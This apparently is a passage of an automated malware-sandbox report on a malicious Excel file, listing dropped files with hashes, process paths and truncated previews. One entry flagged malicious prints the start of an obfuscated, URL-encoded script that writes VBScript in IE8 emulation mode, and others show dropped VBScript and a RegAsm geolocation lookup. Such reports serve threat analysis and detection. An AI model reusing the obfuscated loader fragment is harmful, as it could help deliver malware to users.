                                                                                                                                                                                              SHA-512:A6D754709F30B122112AE30E5AB22486393C5021D33DA4D1304C061863D2E1E79E8AEB029CAE61261BB77D0E7BECD53A7B0106D6EA4368B4C302464E3D941CF7
                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                              Preview:@...e...........................................................
                                                                                                                                                                                              Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                                                                                                                                                                              File Type:HTML document, ASCII text, with very long lines (65520), with CRLF line terminators
                                                                                                                                                                                              Category:modified
                                                                                                                                                                                              Size (bytes):120766
                                                                                                                                                                                              Entropy (8bit):2.5455577746574813
                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                              SSDEEP:96:Ea+M7j2DTSqjoDDTSYHYYamplWIxB7DTS1e2cAT:Ea+QPqV7jT
                                                                                                                                                                                              MD5:86E57A2C2B7B09F3F66D1C66A77238A7
                                                                                                                                                                                              SHA1:A4EB71E37E57D39E6612AE14078D8B1ADE636780
                                                                                                                                                                                              SHA-256:551E991E0C83468B3DF91D9882BE8D99A3C6152796E425748672D8ADE2FFCEF2
                                                                                                                                                                                              SHA-512:FF53A59B556BA5CF2F6BA130CC6B3582D45C64512CA43E19C22C4BE168827129624C1CB4B2BF40F1B178752C8B6E962C67D9C278ED28E4F23FECD8AB97F9077A
                                                                                                                                                                                              Malicious:true
                                                                                                                                                                                              Preview:<script>.. ..document.write(unescape("%3Cscript%3E%0A%3C%21--%0Adocument.write%28unescape%28%22%253Cscript%2520language%253DJavaScript%253Em%253D%2527%25253C%252521DOCTYPE%252520html%25253E%25250A%25253Cmeta%252520http-equiv%25253D%252522X-UA-Compatible%252522%252520content%25253D%252522IE%25253DEmulateIE8%252522%252520%25253E%25250A%25253Chtml%25253E%25250A%25253Cbody%25253E%25250A%25253CsCRIPt%252520type%25253D%252522TEXT/VBscRIpT%252522%25253E%25250Adim%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%2525
                                                                                                                                                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                              File Type:Unicode text, UTF-16, little-endian text, with CRLF line terminators
                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                              Size (bytes):194154
                                                                                                                                                                                              Entropy (8bit):3.731653844214341
                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                              SSDEEP:3072:+OdS5JRjVEw5UaYEJgt5pQGw4KqDsr/3TMno4z5Bi2nvqcNNb8YR3fh:IJRj6Gi0/oo41k2vqcNNb7hfh
                                                                                                                                                                                              MD5:CB62D268830733F07D331B13FEC20EEA
                                                                                                                                                                                              SHA1:8973DF390628EB1FE3F9EEDB4C13BB2E43397F6C
                                                                                                                                                                                              SHA-256:C5BA540355ACE8916716B6EDB0C403766B53A25EF0DF4E5175C192148E620EAD
                                                                                                                                                                                              SHA-512:28A401CFF8046FBFDDF7F8A11ABC7A00BA8E16468EE76D95B509D0D6201E895F785B5C6F9BA4957C17834B70459DA127ABEB57F0715BAF1C198B626CC2942D1A
                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                              Preview:..p.r.i.v.a.t.e. .f.u.n.c.t.i.o.n. .d.i.l.i.g.e.n.c.i.a.d.o.r.(.p.a.n.g.u.e.i.r.a.,. .p.a.i.v.o.,. .d.i.s.n.e.r.v.a.d.o.,. .i.n.s.a.t.u.r.a.v.e.l.m.e.n.t.e.,. .g.u.a.r.d.e.a.r.)..... . . . .d.i.m. .f.i.l.t.e.r..... . . . .d.i.m. .d.i.a.l.e.c.t..... . . . .d.i.m. .e..... . . . .d.i.m. .r.e.s..... . . . .d.i.m. .f.o.r.m.a.t.t.e.d.T.e.x.t..... . . . .d.i.m. .f.l.a.g.s..... . . . ..... . . . .f.l.a.g.s. .=. .0..... . . . . ..... . . . .i.f. .d.i.s.n.e.r.v.a.d.o...A.r.g.u.m.e.n.t.E.x.i.s.t.s.(.N.P.A.R.A._.F.I.L.T.E.R.). .t.h.e.n..... . . . . . . . .f.i.l.t.e.r. .=. .d.i.s.n.e.r.v.a.d.o...A.r.g.u.m.e.n.t.(.N.P.A.R.A._.F.I.L.T.E.R.)..... . . . . . . . .d.i.a.l.e.c.t. .=. .U.R.I._.W.Q.L._.D.I.A.L.E.C.T..... . . . .e.n.d. .i.f..... . . . ..... . . . .i.f. .d.i.s.n.e.r.v.a.d.o...A.r.g.u.m.e.n.t.E.x.i.s.t.s.(.N.P.A.R.A._.D.I.A.L.E.C.T.). .t.h.e.n..... . . . . . . . .d.i.a.l.e.c.t. .=. .d.i.s.n.e.r.v.a.d.o...A.r.g.u.m.e.n.t.(.N.P.A.R.A._.D.I.A.L.E.C.T.)..... . . . .e.n.d. .i.f..... . . . ..... . .
                                                                                                                                                                                              Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                                                                                                                                                                                              File Type:JSON data
                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                              Size (bytes):962
                                                                                                                                                                                              Entropy (8bit):5.013811273052389
                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                              SSDEEP:12:tklu+mnd6CsGkMyGWKyGXPVGArwY307f7aZHI7GZArpv/mOAaNO+ao9W7iN5zzkk:qlu+KdRNuKyGX85jvXhNlT3/7AcV9Wro
                                                                                                                                                                                              MD5:18BC6D34FABB00C1E30D98E8DAEC814A
                                                                                                                                                                                              SHA1:D21EF72B8421AA7D1F8E8B1DB1323AA93B884C54
                                                                                                                                                                                              SHA-256:862D5523F77D193121112B15A36F602C4439791D03E24D97EF25F3A6CBE37ED0
                                                                                                                                                                                              SHA-512:8DF14178B08AD2EDE670572394244B5224C8B070199A4BD851245B88D4EE3D7324FC7864D180DE85221ADFBBCAACB9EE9D2A77B5931D4E878E27334BF8589D71
                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                              Preview:{. "geoplugin_request":"8.46.123.33",. "geoplugin_status":200,. "geoplugin_delay":"1ms",. "geoplugin_credit":"Some of the returned data includes GeoLite2 data created by MaxMind, available from <a href='https:\/\/www.maxmind.com'>https:\/\/www.maxmind.com<\/a>.",. "geoplugin_city":"New York",. "geoplugin_region":"New York",. "geoplugin_regionCode":"NY",. "geoplugin_regionName":"New York",. "geoplugin_areaCode":"",. "geoplugin_dmaCode":"501",. "geoplugin_countryCode":"US",. "geoplugin_countryName":"United States",. "geoplugin_inEU":0,. "geoplugin_euVATrate":false,. "geoplugin_continentCode":"NA",. "geoplugin_continentName":"North America",. "geoplugin_latitude":"40.7123",. "geoplugin_longitude":"-74.0068",. "geoplugin_locationAccuracyRadius":"20",. "geoplugin_timezone":"America\/New_York",. "geoplugin_currencyCode":"USD",. "geoplugin_currencySymbol":"$",. "geoplugin_currencySymbol_UTF8":"$",. "geoplugin_currencyConverter":0.}
                                                                                                                                                                                              Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                                                                                                                                                                              File Type:Windows Enhanced Metafile (EMF) image data version 0x10000
                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                              Size (bytes):2342852
                                                                                                                                                                                              Entropy (8bit):2.6417290025884554
                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                              SSDEEP:6144:D8elSEv4mD3f5ReZdZJElOFmBwPuqOag8J0tuGOE68J0P:DJlSDmzCJEu5Lg00jh600P
                                                                                                                                                                                              MD5:B2020C2F370E4625A9EA3C36EEA00DAF
                                                                                                                                                                                              SHA1:3BCAF1F0CC2E64FDEC9FD0941BA7903A4772F093
                                                                                                                                                                                              SHA-256:BF45DCFBDBC932E7AE776DA6BDCB2026E3C51924BFC017DB37482C68C8722C32
                                                                                                                                                                                              SHA-512:78F17558C35106A343B868C35C9429380CA6F606ABCD7644CF866B67CCB157A57F050173B39C1D4B6C86A20039E4AC7F0B12CA564D754C9DC163C877583C7C08
                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                              Preview:....l...............2...........@m..?... EMF.....#.'...4...................8...X....................?......F...,... ...EMF+.@..................x...x...F...\...P...EMF+"@...........@..........$@..........0@.............?!@...........@..........................................................!......."...........!......."...........................!..............................."...........!...................................................3..."...........!...................................................3..."...........!...................................................3..."...........!...................................................3..."...........!...................................................3...'.......................%...........................................................L...d...v.../......._...v.../.......1...!..............?...........?................................L...d...................................!..............?...........?............................
                                                                                                                                                                                              Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                                                                                                                                                                              File Type:Windows Enhanced Metafile (EMF) image data version 0x10000
                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                              Size (bytes):884312
                                                                                                                                                                                              Entropy (8bit):1.2944965349348616
                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                              SSDEEP:1536:W3dki8JungPuzcn6F1Tny9Cie/koPs9h9RHJFUrnT15vWP5cPpmJ2dvRaQq3vMog:Hux/ZiOE85e+8J2dvRcvMyw
                                                                                                                                                                                              MD5:9ABE7EB352E0DB96B52C99AC2FDEA85F
                                                                                                                                                                                              SHA1:8DC45D02308275BA32B7FFB320A3042256D40C8B
                                                                                                                                                                                              SHA-256:EC022DFF1CC8251BA9D849C16431914635473FC5457AE73AA277651B47948869
                                                                                                                                                                                              SHA-512:E43325B927F5365F16118B67E1830B2A0E8CC051D9AEAB144DA6A75751CA39CC1831158270A50ED31BCCBA29C98A56769E516F36C45CB5FAA1BB6ED92CC0A5EB
                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                              Preview:....l............................2...... EMF....X~..........................8...X....................?...........................................2......................Q....}..........................................P...(...x...$}...... ....2......(...................$}..........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                                                              Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                                                                                                                                                                              File Type:Windows Enhanced Metafile (EMF) image data version 0x10000
                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                              Size (bytes):8084
                                                                                                                                                                                              Entropy (8bit):2.570503528684488
                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                              SSDEEP:96:j+RiOO++Z397Q2Acgze0xBdEQzBfCC7Boff8oBJ6ANQ4HJV:jt7ecgKgvzBArH
                                                                                                                                                                                              MD5:A0D51FBAA34316A0B3E02FA2B5BEA0B8
                                                                                                                                                                                              SHA1:01B3F570EFCA831762B154AC65E11C122319D35D
                                                                                                                                                                                              SHA-256:BC55995ADDDFBE0105BDACE8E1603EA7E9DA698C0BDC7E91F043578BF6B28157
                                                                                                                                                                                              SHA-512:93E08DF7E102CCD3D9077284E1E80369A21BA86B9194B72528BB140ABA83E65E7E2DC59471E2484AE805AF1C13E41C6A5273150E2EFAB06CABFA21BC889405E5
                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                              Preview:....l.........../...n............9...... EMF................................8...X....................?......F...,... ...EMF+.@..................x...x...F...\...P...EMF+"@...........@..........$@..........0@.............?!@...........@..........................................................!......."...........!......."...........................!..............................."...........!...............................................0...o..."...........!...............................................0...o..."...........!...............................................0...o..."...........!...............................................0...o..."...........!...............................................0...o...'.......................%...........................................................L...d...........>...............q.......!..............?...........?................................R...p...................................A.r.i.a.l...............................................
                                                                                                                                                                                              Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                                                                                                                                                                              File Type:Windows Enhanced Metafile (EMF) image data version 0x10000
                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                              Size (bytes):38272
                                                                                                                                                                                              Entropy (8bit):2.8200425031385645
                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                              SSDEEP:192:6/UjPGlVrhaHoq7x0ii1lild6rMT54GtXU+j9hMQmlC+a6gz5nCf5OBgJP+SKA:6/1MH61lq4GtXJMQmlC+a6gz5SOyJ1/
                                                                                                                                                                                              MD5:C898CDC91D0BD5EFB41E576B8A19E931
                                                                                                                                                                                              SHA1:B9ED5CAC5A526CF8095AB8F8CE36C39F78422407
                                                                                                                                                                                              SHA-256:044E7012311B28991E687A081E1AC94B7D7EB80F1BE1970F519E949D01A05CA2
                                                                                                                                                                                              SHA-512:6BCD700AAB23B2205E8294C3071158CA42D4BA6B4B098CA6B511A386FF2E1F8D6B6A3BED4F307475F03161F96425194DEA5581411D3544E95F6D17BCD3264019
                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                              Preview:....l...........c................N...@.. EMF........l.......................8...X....................?......F...,... ...EMF+.@..................x...x...F...\...P...EMF+"@...........@..........$@..........0@.............?!@...........@..........................................................!......."...........!......."...........................!..............................."...........!...............................................d......."...........!...............................................d......."...........!...............................................d......."...........!...............................................d......."...........!...............................................d.......'.......................%...........................................................L...d...........c...............d.......!..............?...........?................................R...p.................................. C.a.l.i.b.r.i...........................................
                                                                                                                                                                                              Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                                                                                                                                                                              File Type:Windows Enhanced Metafile (EMF) image data version 0x10000
                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                              Size (bytes):76472
                                                                                                                                                                                              Entropy (8bit):3.025081600163608
                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                              SSDEEP:384:luYYST5PIYfLe2b52XPl6hAJC00EddMdf0Ii90Z5xxr8sdEdeC:4igYfqg52XPl6hAJC0irRHC
                                                                                                                                                                                              MD5:A4B79FF3D7725F69AB98C49A72805D64
                                                                                                                                                                                              SHA1:8617AF425CE74F816B2CE28FF7BF08A7F5317030
                                                                                                                                                                                              SHA-256:2DE8B86E62DE48780D92E82B3132F559DF0324A000F9BAFC8CAF3D2789D17CE5
                                                                                                                                                                                              SHA-512:3B7E25DBDFDAD51FFD8DB140091405FABD3242704C0FD0517CEB10C59E5AF57098CA41C3DCA9F9E80045D8A75EE8415927467457E636EA475C0BE95063C94C49
                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                              Preview:....l..............................eQ.. EMF.....*..y.......................8...X....................?......F...,... ...EMF+.@..................x...x...F...\...P...EMF+"@...........@..........$@..........0@.............?!@...........@..........................................................!......."...........!......."...........................!..............................."...........!......................................................."...........!......................................................."...........!......................................................."...........!......................................................."...........!.......................................................'.......................%...........................................................L...d...........T...)..............."...!..............?...........?................................L...d.......).......G.......)...........!..............?...........?............................
                                                                                                                                                                                              Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                                                                                                                                                                              File Type:Windows Enhanced Metafile (EMF) image data version 0x10000
                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                              Size (bytes):2342852
                                                                                                                                                                                              Entropy (8bit):2.6417290025884554
                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                              SSDEEP:6144:D8elSEv4mD3f5ReZdZJElOFmBwPuqOag8J0tuGOE68J0P:DJlSDmzCJEu5Lg00jh600P
                                                                                                                                                                                              MD5:B2020C2F370E4625A9EA3C36EEA00DAF
                                                                                                                                                                                              SHA1:3BCAF1F0CC2E64FDEC9FD0941BA7903A4772F093
                                                                                                                                                                                              SHA-256:BF45DCFBDBC932E7AE776DA6BDCB2026E3C51924BFC017DB37482C68C8722C32
                                                                                                                                                                                              SHA-512:78F17558C35106A343B868C35C9429380CA6F606ABCD7644CF866B67CCB157A57F050173B39C1D4B6C86A20039E4AC7F0B12CA564D754C9DC163C877583C7C08
                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                              Preview:....l...............2...........@m..?... EMF.....#.'...4...................8...X....................?......F...,... ...EMF+.@..................x...x...F...\...P...EMF+"@...........@..........$@..........0@.............?!@...........@..........................................................!......."...........!......."...........................!..............................."...........!...................................................3..."...........!...................................................3..."...........!...................................................3..."...........!...................................................3..."...........!...................................................3...'.......................%...........................................................L...d...v.../......._...v.../.......1...!..............?...........?................................L...d...................................!..............?...........?............................
                                                                                                                                                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                              File Type:very short file (no magic)
                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                              Size (bytes):1
                                                                                                                                                                                              Entropy (8bit):0.0
                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                              SSDEEP:3:U:U
                                                                                                                                                                                              MD5:C4CA4238A0B923820DCC509A6F75849B
                                                                                                                                                                                              SHA1:356A192B7913B04C54574D18C28D46E6395428AB
                                                                                                                                                                                              SHA-256:6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
                                                                                                                                                                                              SHA-512:4DFF4EA340F0A823F15D3F4F01AB62EAE0E5DA579CCB851F8DB9DFE84C58B2B37B89903A740E1EE172DA793A6E79D560E5F7F9BD058A12A280433ED6FA46510A
                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                              Preview:1
                                                                                                                                                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                              File Type:very short file (no magic)
                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                              Size (bytes):1
                                                                                                                                                                                              Entropy (8bit):0.0
                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                              SSDEEP:3:U:U
                                                                                                                                                                                              MD5:C4CA4238A0B923820DCC509A6F75849B
                                                                                                                                                                                              SHA1:356A192B7913B04C54574D18C28D46E6395428AB
                                                                                                                                                                                              SHA-256:6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
                                                                                                                                                                                              SHA-512:4DFF4EA340F0A823F15D3F4F01AB62EAE0E5DA579CCB851F8DB9DFE84C58B2B37B89903A740E1EE172DA793A6E79D560E5F7F9BD058A12A280433ED6FA46510A
                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                              Preview:1
                                                                                                                                                                                              Process:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
                                                                                                                                                                                              File Type:Intel 80386 COFF object file, not stripped, 3 sections, symbol offset=0x48a, 9 symbols, created Tue Oct 8 13:37:19 2024, 1st section name ".debug$S"
                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                              Size (bytes):1328
                                                                                                                                                                                              Entropy (8bit):3.9811890424815304
                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                              SSDEEP:24:HYe9E2USA1dHPwKdNWI+ycuZhNRakSPPNnqSqd:AZ4Kd41ulRa3NqSK
                                                                                                                                                                                              MD5:A29DAD6474A3FEF20D0EDB07257DF7C0
                                                                                                                                                                                              SHA1:E40067678C35C3967AA41C0D656DD6ED0DFCBA55
                                                                                                                                                                                              SHA-256:B8B487730BBC9B6C68CFE3B5439CF0C6CA95B0C4D8B3C2E0D315CAEBE1C34557
                                                                                                                                                                                              SHA-512:0F97F76D3A4A4302B2E351BCA9C0F43F77B80658775F8D9937F5E8B80D59E04B30F23BE07F6AE5345DF6EA8E9A2CAAEFDDA2D1CF590199585A3BDE12179D1717
                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                              Preview:L....5.g.............debug$S........L...................@..B.rsrc$01........X.......0...........@..@.rsrc$02........P...:...............@..@........T....c:\Users\user\AppData\Local\Temp\nnmswnbn\CSC2F3646BAED0D4162AB721EA9AB40E2EA.TMP................d..,..H].B..............4.......C:\Users\user\AppData\Local\Temp\RES781D.tmp.-.<....................a..Microsoft (R) CVTRES.[.=..cwd.C:\Windows\system32.exe.C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe................................................0.......................H.......L...........H.........L.4...V.S._.V.E.R.S.I.O.N._.I.N.F.O.............................?...........................D.....V.a.r.F.i.l.e.I.n.f.o.....$.....T.r.a.n.s.l.a.t.i.o.n...............S.t.r.i.n.g.F.i.l.e.I.n.f.o.........0.0.0.0.0.4.b.0...,.....F.i.l.e.D.e.s.c.r.i.p.t.i.o.n..... ...0.....F.i.l.e.V.e.r.s.i.o.n.....0...0...0...0...<.....I.n.t.e.r.n.a.l.N.a.m.e...n.n.m.s.w.n.b.n...d.l.l.....(.....L.e.g.a.l.C.o.p.y.r.i.g.h.t... ...D.....O.r.i.g.i.n.
                                                                                                                                                                                              Process:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
                                                                                                                                                                                              File Type:Intel 80386 COFF object file, not stripped, 3 sections, symbol offset=0x48a, 9 symbols, created Tue Oct 8 13:37:34 2024, 1st section name ".debug$S"
                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                              Size (bytes):1328
                                                                                                                                                                                              Entropy (8bit):3.9952180691599746
                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                              SSDEEP:24:Hve9EurcdvdHbhwKdNWI+ycuZhNUnGakS1nXPNnqSqd:WrcdV7KKd41ulTa3PqSK
                                                                                                                                                                                              MD5:2FD599F67D61EB20EE677BCDB096B382
                                                                                                                                                                                              SHA1:3F7D757D9E98CE7C60736EBD56F8428E33B3FE2C
                                                                                                                                                                                              SHA-256:FF32DF779C555888728BBB8C18AEB8588FEE034B94F2C495B4105445CB23B45C
                                                                                                                                                                                              SHA-512:E959FB30490DFBF0942E1C646A7457348081030FDA496EC1BE309154DA12C709CD107D953E95A54C81267EA0DF84B0A716B1B35EECC81537C00ACA873A474F4B
                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                              Preview:L....5.g.............debug$S........L...................@..B.rsrc$01........X.......0...........@..@.rsrc$02........P...:...............@..@........S....c:\Users\user\AppData\Local\Temp\op4j5mgw\CSC61FD86854EBB47F380D5789CC9CFF7A.TMP..............................b..........4.......C:\Users\user\AppData\Local\Temp\RESB635.tmp.-.<....................a..Microsoft (R) CVTRES.[.=..cwd.C:\Windows\system32.exe.C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe................................................0.......................H.......L...........H.........L.4...V.S._.V.E.R.S.I.O.N._.I.N.F.O.............................?...........................D.....V.a.r.F.i.l.e.I.n.f.o.....$.....T.r.a.n.s.l.a.t.i.o.n...............S.t.r.i.n.g.F.i.l.e.I.n.f.o.........0.0.0.0.0.4.b.0...,.....F.i.l.e.D.e.s.c.r.i.p.t.i.o.n..... ...0.....F.i.l.e.V.e.r.s.i.o.n.....0...0...0...0...<.....I.n.t.e.r.n.a.l.N.a.m.e...o.p.4.j.5.m.g.w...d.l.l.....(.....L.e.g.a.l.C.o.p.y.r.i.g.h.t... ...D.....O.r.i.g.i.n.
                                                                                                                                                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                              File Type:very short file (no magic)
                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                              Size (bytes):1
                                                                                                                                                                                              Entropy (8bit):0.0
                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                              SSDEEP:3:U:U
                                                                                                                                                                                              MD5:C4CA4238A0B923820DCC509A6F75849B
                                                                                                                                                                                              SHA1:356A192B7913B04C54574D18C28D46E6395428AB
                                                                                                                                                                                              SHA-256:6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
                                                                                                                                                                                              SHA-512:4DFF4EA340F0A823F15D3F4F01AB62EAE0E5DA579CCB851F8DB9DFE84C58B2B37B89903A740E1EE172DA793A6E79D560E5F7F9BD058A12A280433ED6FA46510A
                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                              Preview:1
                                                                                                                                                                                              Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                                                                                                                                                                                              File Type:Extensible storage engine DataBase, version 0x620, checksum 0x3faf030b, page size 32768, DirtyShutdown, Windows version 6.1
                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                              Size (bytes):21037056
                                                                                                                                                                                              Entropy (8bit):1.1355656523059676
                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                              SSDEEP:24576:991U91o2I+0mZ5lEHLcGaHqqnEXwPtofJIRH330nW/jMB1emX4UJlNd:99EXaLuHqqEXwPW+RHA6m1fN
                                                                                                                                                                                              MD5:42381778C9129862CEE10B7393B6CDE0
                                                                                                                                                                                              SHA1:5B193BC48B95F3D526908D9D99B351957A9A4F66
                                                                                                                                                                                              SHA-256:977FF575A547322F2B271FC7BA40E19B72AC344AF6E65E051E5053F7E5FEB2AD
                                                                                                                                                                                              SHA-512:1BB51839EC5B37E45DB339AE9DBC293EDEE9D376E553DB5170809A6AA9568B0FFF3090EC988916183396D43884BEEE1124D59A618FD3D8B9B4879E1A41BADE98
                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                              Preview:?...... ........................u..............................;:...{...%...|.......................................u..............................................................................................+............................................................................................................................... .......4....{......................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                              File Type:very short file (no magic)
                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                              Size (bytes):1
                                                                                                                                                                                              Entropy (8bit):0.0
                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                              SSDEEP:3:U:U
                                                                                                                                                                                              MD5:C4CA4238A0B923820DCC509A6F75849B
                                                                                                                                                                                              SHA1:356A192B7913B04C54574D18C28D46E6395428AB
                                                                                                                                                                                              SHA-256:6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
                                                                                                                                                                                              SHA-512:4DFF4EA340F0A823F15D3F4F01AB62EAE0E5DA579CCB851F8DB9DFE84C58B2B37B89903A740E1EE172DA793A6E79D560E5F7F9BD058A12A280433ED6FA46510A
                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                              Preview:1
                                                                                                                                                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                              File Type:very short file (no magic)
                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                              Size (bytes):1
                                                                                                                                                                                              Entropy (8bit):0.0
                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                              SSDEEP:3:U:U
                                                                                                                                                                                              MD5:C4CA4238A0B923820DCC509A6F75849B
                                                                                                                                                                                              SHA1:356A192B7913B04C54574D18C28D46E6395428AB
                                                                                                                                                                                              SHA-256:6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
                                                                                                                                                                                              SHA-512:4DFF4EA340F0A823F15D3F4F01AB62EAE0E5DA579CCB851F8DB9DFE84C58B2B37B89903A740E1EE172DA793A6E79D560E5F7F9BD058A12A280433ED6FA46510A
                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                              Preview:1
                                                                                                                                                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                              File Type:very short file (no magic)
                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                              Size (bytes):1
                                                                                                                                                                                              Entropy (8bit):0.0
                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                              SSDEEP:3:U:U
                                                                                                                                                                                              MD5:C4CA4238A0B923820DCC509A6F75849B
                                                                                                                                                                                              SHA1:356A192B7913B04C54574D18C28D46E6395428AB
                                                                                                                                                                                              SHA-256:6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
                                                                                                                                                                                              SHA-512:4DFF4EA340F0A823F15D3F4F01AB62EAE0E5DA579CCB851F8DB9DFE84C58B2B37B89903A740E1EE172DA793A6E79D560E5F7F9BD058A12A280433ED6FA46510A
                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                              Preview:1
                                                                                                                                                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                              File Type:very short file (no magic)
                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                              Size (bytes):1
                                                                                                                                                                                              Entropy (8bit):0.0
                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                              SSDEEP:3:U:U
                                                                                                                                                                                              MD5:C4CA4238A0B923820DCC509A6F75849B
                                                                                                                                                                                              SHA1:356A192B7913B04C54574D18C28D46E6395428AB
                                                                                                                                                                                              SHA-256:6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
                                                                                                                                                                                              SHA-512:4DFF4EA340F0A823F15D3F4F01AB62EAE0E5DA579CCB851F8DB9DFE84C58B2B37B89903A740E1EE172DA793A6E79D560E5F7F9BD058A12A280433ED6FA46510A
                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                              Preview:1
                                                                                                                                                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                              File Type:very short file (no magic)
                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                              Size (bytes):1
                                                                                                                                                                                              Entropy (8bit):0.0
                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                              SSDEEP:3:U:U
                                                                                                                                                                                              MD5:C4CA4238A0B923820DCC509A6F75849B
                                                                                                                                                                                              SHA1:356A192B7913B04C54574D18C28D46E6395428AB
                                                                                                                                                                                              SHA-256:6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
                                                                                                                                                                                              SHA-512:4DFF4EA340F0A823F15D3F4F01AB62EAE0E5DA579CCB851F8DB9DFE84C58B2B37B89903A740E1EE172DA793A6E79D560E5F7F9BD058A12A280433ED6FA46510A
                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                              Preview:1
                                                                                                                                                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                              File Type:very short file (no magic)
                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                              Size (bytes):1
